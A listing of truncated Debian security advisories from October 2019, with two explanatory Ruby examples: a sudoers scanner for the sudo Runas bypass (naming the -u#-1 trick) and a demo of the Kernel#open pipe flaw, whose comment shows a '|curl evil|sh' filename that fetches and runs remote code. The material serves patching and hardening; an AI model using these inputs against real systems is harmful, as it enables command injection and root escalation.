14407 matches found
[SECURITY] [DLA 1961-1] milkytracker security update
Package : milkytracker Version : 0.90.85+dfsg-2.2+deb8u1 CVE ID : CVE-2019-14464 CVE-2019-14496 CVE-2019-14497 Debian Bug : 933964 Fredric discovered several buffer overflows in MilkyTracker; a brief description of each is given below. CVE-2019-14464 XMFile::read in XMFile.cpp in milkyplay ...
[SECURITY] [DLA 1968-1] imagemagick security update
Package : imagemagick Version : 8:6.8.9.9-5+deb8u18 CVE ID : CVE-2019-11470 CVE-2019-14981 CVE-2019-15139 CVE-2019-15140 Multiple vulnerabilities have been found in imagemagick, an image processing toolkit. CVE-2019-11470 Uncontrolled resource consumption caused by insufficiently sanitized image...
[SECURITY] [DSA 4546-1] openjdk-11 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4546-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 20, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1966-1] aspell security update
Package : aspell Version : 0.60.7~20110707-1.3+deb8u1 CVE ID : CVE-2019-17544 It was discovered that Aspell, the GNU spell checker, incorrectly handled certain inputs, leading to a stack-based buffer over-read. An attacker could potentially access sensitive information. For Debian 8 "Jessie",...
[SECURITY] [DLA 1965-1] nfs-utils security update
Package : nfs-utils Version : 1.2.8-9+deb8u1 CVE ID : CVE-2019-3689 Debian Bug : 940848 In the nfs-utils package, providing support files for the Network File System (NFS) including the rpc.statd daemon, the directory /var/lib/nfs is owned by statd:nogroup. This directory contains files owned and manag...
[SECURITY] [DSA 4545-1] mediawiki security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4545-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 18, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1963-2] poppler regression update
Package : poppler Version : 0.26.5-2+deb8u13 CVE ID : CVE-2019-10871 Debian Bug : 942503 The fix for CVE-2019-10871 broke xpdf. This change has been reverted until a better fix can be developed. For Debian 8 "Jessie", this problem has been fixed in version 0.26.5-2+deb8u13. We recommend...
[SECURITY] [DLA 1963-1] poppler security update
Package : poppler Version : 0.26.5-2+deb8u12 CVE ID : CVE-2019-9959 CVE-2019-10871 Two buffer allocation issues were identified in poppler. CVE-2019-9959 An unexpected negative length value can cause an integer overflow, which in turn makes it possible to allocate a large memory chunk on the hea...
[SECURITY] [DLA 1960-1] wordpress security update
Package : wordpress Version : 4.1.27+dfsg-0+deb8u1 CVE ID : CVE-2019-16217 CVE-2019-16218 CVE-2019-16219 CVE-2019-16220 CVE-2019-16221 CVE-2019-16222 CVE-2019-16223 Debian Bug : 939543 Several cross-site scripting (XSS) vulnerabilities were discovered in WordPress, a popular content management...
[SECURITY] [DLA 1964-1] sudo security update
Package : sudo Version : 1.8.10p3-1+deb8u6 CVE ID : CVE-2019-14287 Debian Bug : 942322 In sudo, a program that provides limited super user privileges to specific users, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can caus...
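The "policy blacklist" in DLA 1964-1 is a Runas list such as (ALL, !root): the user may run the listed command as anyone except the excluded accounts. On sudo releases before 1.8.28 that exclusion could be bypassed by naming a uid sudo resolves to 0 (-u#-1 or -u#4294967295), which is what CVE-2019-14287 describes. What follows is an added example, not code from sudo or from the advisory: a small Ruby scanner that parses sudoers user specifications and reports the entries whose Runas list both grants ALL and relies on a "!" exclusion, i.e. the entries worth reviewing on a host that has not yet taken the update. The sudoers lines are constructed for illustration and the helper names are the example's own.

```ruby
# Added example, not sudo's code. Flags sudoers user specifications that are
# exposed to the CVE-2019-14287 bypass: a Runas user list that grants "ALL"
# but excludes specific users with "!" (typically "!root").
SUDOERS_LINE = /\A(?<who>\S+)\s+(?<host>\S+)\s*=\s*\((?<runas>[^)]*)\)\s*(?<cmds>.*)\z/

# Parse one sudoers line. Returns nil for blank lines, comments, Defaults and
# alias lines, and entries without an explicit "(runas)" list, since those
# default to root and have no exclusion to bypass.
def parse_spec(line)
  line = line.strip
  return nil if line.empty? || line.start_with?('#')
  m = SUDOERS_LINE.match(line) or return nil
  # "(users:groups)"; the group part is optional.
  users, groups = m[:runas].split(':', 2).map { |part| part.split(',').map(&:strip) }
  { who: m[:who], host: m[:host], runas_users: users,
    runas_groups: groups || [], cmds: m[:cmds] }
end

# True when the Runas user list says "anyone except ..." : exactly the shape
# the advisory's "policy blacklist" refers to.
def bypassable_runas?(spec)
  users = spec[:runas_users]
  users.include?('ALL') && users.any? { |u| u.start_with?('!') }
end

def find_bypassable_entries(text)
  text.each_line.map { |l| parse_spec(l) }.compact.select { |s| bypassable_runas?(s) }
end

# Constructed sample sudoers content (hypothetical users and commands).
SAMPLE_SUDOERS = <<~SUDOERS
  # /etc/sudoers (constructed sample)
  Defaults env_reset
  alice ALL=(ALL, !root) /usr/bin/vim
  bob   ALL=(ALL:ALL) ALL
  carol ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
  dave  ALL=(www-data) /usr/bin/php
  erin  ALL=(ALL, !root, !postgres) /usr/bin/psql
SUDOERS

if $PROGRAM_NAME == __FILE__
  find_bypassable_entries(SAMPLE_SUDOERS).each do |s|
    puts "#{s[:who]}@#{s[:host]}: runas=(#{s[:runas_users].join(', ')}) cmds=#{s[:cmds]}"
  end
end
```

On the sample above the scanner reports alice and erin; bob and carol grant root outright (nothing to bypass) and dave's Runas list does not contain ALL. Run it against the real file with `sudo cat /etc/sudoers /etc/sudoers.d/* | ruby scan.rb`-style plumbing, but remember the fix is the package update, not rewriting the Runas lists.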
[SECURITY] [DLA 1714-2] libsdl2 regression update
Package : libsdl2 Version : 2.0.2+dfsg1-6+deb8u2 CVE ID : CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638 The update of libsdl2 released as DLA 1714-1 led to several regressions, as reported ...
[SECURITY] [DLA 1713-2] libsdl1.2 regression update
Package : libsdl1.2 Version : 1.2.15-10+deb8u2 CVE ID : CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638 The update of libsdl1.2 released as DLA 1713-1 led to a regression, caused by an...
[SECURITY] [DSA 4544-1] unbound security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4544-1 [email protected] https://www.debian.org/security/ Sebastien Delafond October 16, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4509-3] apache2 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4509-3 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 15, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1959-1] xtrlock security update
Package : xtrlock Version : 2.6+deb8u1 CVE ID : CVE-2016-10894 Debian Bug : 830726 It was discovered that multitouch devices were not being disabled by the "xtrlock" screen locking utility. xtrlock did not block multitouch events so an attacker could still input and thus control various programs...
[SECURITY] [DSA 4543-1] sudo security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4543-1 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 14, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1953-2] clamav regression update
Package : clamav Version : 0.101.4+dfsg-0+deb8u2 CVE ID : CVE-2019-12625 CVE-2019-12900 Debian Bug : 942172 The update of clamav released as DLA 1953-1 led to permission issues on /var/run/clamav. This caused several users to experience issues restarting the clamav daemon. This regression is caus...
[SECURITY] [DLA 1958-1] libdatetime-timezone-perl new upstream version
Package : libdatetime-timezone-perl Version : 1:1.75-2+2019c This update includes the changes in tzdata 2019c for the Perl bindings. For the list of changes, see DLA-1957-1. For Debian 8 "Jessie", this problem has been fixed in version 1:1.75-2+2019c. We recommend that you upgrade your...
[SECURITY] [DLA 1957-1] tzdata new upstream version
Package : tzdata Version : 2019c-0+deb8u1 This update includes the changes in tzdata 2019c. Notable changes are: - Brazil has canceled DST and will stay on standard time indefinitely. - Fiji's next DST transitions will be 2019-11-10 and 2020-01-12 instead of 2019-11-03 and 2020-01-19. - Norfolk...
[SECURITY] [DSA 4539-3] openssl regression update
------------------------------------------------------------------------- Debian Security Advisory DSA-4539-3 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 13, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1955-1] tcpdump security update
Package : tcpdump Version : 4.9.3-1~deb8u1 CVE ID : CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 CVE-2018-14879 CVE-2018-14880 CVE-2018-14881 CVE-2018-14882...
[SECURITY] [DLA 1956-1] ruby-openid security update
Package : ruby-openid Version : 2.5.0debian-1+deb8u1 CVE ID : CVE-2019-11027 ruby-openid performed discovery first, and then verification. This allowed an attacker to change the URL used for discovery and trick the server into connecting to the URL. This server in turn could be a private server n...
[SECURITY] [DLA 1954-1] lucene-solr security update
Package : lucene-solr Version : 3.6.2+dfsg-5+deb8u3 CVE ID : CVE-2019-0193 A security vulnerability was discovered in lucene-solr, an enterprise search server. The DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole...
[SECURITY] [DLA 1953-1] clamav security update
Package : clamav Version : 0.101.4+dfsg-0+deb8u1 CVE ID : CVE-2019-12625 CVE-2019-12900 Debian Bug : 34359 It was discovered that clamav, the open source antivirus engine, is affected by the following security vulnerabilities: CVE-2019-12625 Denial of Service (DoS) vulnerability, resulting from...
[SECURITY] [DLA 1952-1] rsyslog security update
Package : rsyslog Version : 8.4.2-1+deb8u3 CVE IDs : CVE-2019-17041 CVE-2019-17042 Debian Bugs : 942065 942067 It was discovered that there were two vulnerabilities in the rsyslog system/kernel logging daemon, in the parsers for AIX and Cisco log messages respectively. For Debian 8 "Jessie", these...
[SECURITY] [DLA 1951-1] libtomcrypt security update
Package : libtomcrypt Version : 1.17-6+deb8u1 CVE ID : CVE-2019-17362 It was discovered that there was a denial of service vulnerability in the libtomcrypt cryptographic library. An out-of-bounds read and crash could occur via carefully-crafted "DER" encoded data, e.g. by importing an X.509...
[SECURITY] [DLA 1950-1] openjpeg2 security update
Package : openjpeg2 Version : 2.1.0-2+deb8u8 CVE ID : CVE-2018-21010 Debian Bug : 939553 A heap buffer overflow vulnerability was discovered in openjpeg2, the open-source JPEG 2000 codec. This vulnerability is caused by insufficient validation of width and height of image components in...
[SECURITY] [DLA 1949-1] xen security update
Package : xen Version : 4.4.4lts5-0+deb8u1 CVE ID : CVE-2018-19961 CVE-2018-19962 CVE-2018-19966 XSA ID : XSA-275 XSA-280 XSA-285 XSA-287 XSA-288 Multiple vulnerabilities have been discovered in the Xen hypervisor, which could result in denial of service, information leaks or privilege escalatio...
[SECURITY] [DSA 4539-2] openssh regression update
------------------------------------------------------------------------- Debian Security Advisory DSA-4539-2 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 07, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1948-1] ruby-mini-magick security update
Package : ruby-mini-magick Version : 3.8.1-1+deb8u1 CVE ID : CVE-2019-13574 Debian Bug : 931932 In lib/minimagick/image.rb in ruby-mini-magick, a fetched remote image filename could cause remote command execution because Image.open input is directly passed to Kernel#open, which accepts a | charact...
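The Kernel#open behaviour behind CVE-2019-13574, shown as an added Ruby example that is not ruby-mini-magick's own code: Kernel#open treats an argument beginning with "|" as a command to run and hands back its stdout as an IO, so a filename the attacker controls becomes command execution, whereas File.open only ever opens a file. The hardened helper also refuses anything that is not a regular file before reading it. The "|echo pwned" input and the helper names are constructed for illustration.

```ruby
# Added example (not ruby-mini-magick's code): the Kernel#open pitfall from
# CVE-2019-13574 next to the File.open form that does not have it.
require 'tempfile'

# Vulnerable pattern: Kernel#open (the bare `open`) interprets a leading "|"
# as "spawn this command and read its output", so an attacker-chosen
# filename such as "|curl evil|sh" is executed, not opened.
def vulnerable_read(path)
  open(path) { |io| io.read }   # Kernel#open, NOT File.open
end

# Hardened form: File.open never interprets "|"; a path of "|echo pwned"
# is simply a file that does not exist (Errno::ENOENT).
def safe_read(path)
  File.open(path, 'rb') { |io| io.read }
end

# Input validation in front of the safe call: reject pipe syntax explicitly so
# the failure is a clear policy error, and only read regular files.
def open_image_file(path)
  raise ArgumentError, "pipe syntax rejected: #{path.inspect}" if path.start_with?('|')
  raise ArgumentError, "not a regular file: #{path.inspect}" unless File.file?(path)
  safe_read(path)
end

if $PROGRAM_NAME == __FILE__
  # Constructed demonstration input: a harmless command in place of a filename.
  puts "Kernel#open ran a command: #{vulnerable_read('|echo pwned').inspect}"
  begin
    safe_read('|echo pwned')
  rescue Errno::ENOENT => e
    puts "File.open treated it as a path: #{e.message}"
  end
end
```

Newer Ruby releases print a deprecation warning for Kernel#open with a leading "|" (the behaviour is slated for removal), but on the Ruby versions shipped with Debian 8 it runs silently, which is why the library had to stop using it.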
[SECURITY] [DLA 1942-2] phpbb3 regression update
This is a follow-up to DLA-1942-1. There was some confusion about the correct fix for CVE-2019-13776. The correct announcement for this DLA should have been: Package : phpbb3 Version : 3.0.12-5+deb8u4 CVE ID : CVE-2019-13776 CVE-2019-16993 In phpBB, includes/acp/acp_bbcodes.php had...
[SECURITY] [DLA 1947-1] libreoffice security update
Package : libreoffice Version : 1:4.3.3-2+deb8u13 CVE ID : CVE-2019-9848 CVE-2019-9849 CVE-2019-9850 CVE-2019-9851 CVE-2019-9852 CVE-2019-9853 CVE-2019-9854 Several vulnerabilities were discovered in LibreOffice, the office productivity suite. CVE-2019-9848 Nils Emmerich discovered that malicious...
[SECURITY] [DSA 4542-1] jackson-databind security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4542-1 [email protected] https://www.debian.org/security/ Sebastien Delafond October 06, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1946-1] novnc security update
Package : novnc Version : 1:0.4+dfsg+1+20131010+gitf68af8af3d-4+deb8u1 CVE ID : CVE-2017-18635 An XSS vulnerability was discovered in noVNC in which the remote VNC server could inject arbitrary HTML into the noVNC web page via the messages propagated to the status field, such as the VNC server...
[SECURITY] [DSA 4541-1] libapreq2 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4541-1 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso October 04, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1945-1] openconnect security update
Package : openconnect Version : 6.00-2+deb8u1 CVE ID : CVE-2019-16239 Debian Bug : 940871 A vulnerability was discovered by Lukas Kupczyk of the Advanced Research Team at CrowdStrike Intelligence in OpenConnect, an open client for Cisco AnyConnect, Pulse and GlobalProtect VPNs. A malicious HTTP serve...
[SECURITY] [DLA 1944-1] libapreq2 security update
Package : libapreq2 Version : 2.13-4+deb8u1 CVE ID : CVE-2019-12412 Debian Bug : 939937 It was discovered that there was a remotely-exploitable null pointer dereference in libapreq2, a library for manipulating HTTP requests. For Debian 8 "Jessie", this issue has been fixed in libapreq2 version...
[SECURITY] [DLA 1943-1] jackson-databind security update
Package : jackson-databind Version : 2.4.2-2+deb8u9 CVE ID : CVE-2019-14540 CVE-2019-16335 CVE-2019-16942 CVE-2019-16943 Debian Bug : 940498 941530 More deserialization flaws were discovered in jackson-databind relating to the classes in com.zaxxer.hikari.HikariConfig,...
[SECURITY] [DSA 4509-2] subversion update
------------------------------------------------------------------------- Debian Security Advisory DSA-4509-2 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 2, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4540-1] openssl1.0 security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4540-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 01, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DSA 4539-1] openssl security update
------------------------------------------------------------------------- Debian Security Advisory DSA-4539-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff October 01, 2019 https://www.debian.org/security/faq -...
[SECURITY] [DLA 1940-1] linux-4.9 security update
Package : linux-4.9 Version : 4.9.189-3+deb9u1~deb8u1 CVE ID : CVE-2019-14821 CVE-2019-14835 CVE-2019-15117 CVE-2019-15118 CVE-2019-15902 Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks. CVE-2019-14821...
[SECURITY] [DLA 1942-1] phpbb3 security update
Package : phpbb3 Version : 3.0.12-5+deb8u4 CVE ID : CVE-2019-16993 In phpBB, includes/acp/acp_bbcodes.php had improper verification of a CSRF token on the BBCode page in the Administration Control Panel. An actual CSRF attack was possible if an attacker also managed to retrieve the session id of a...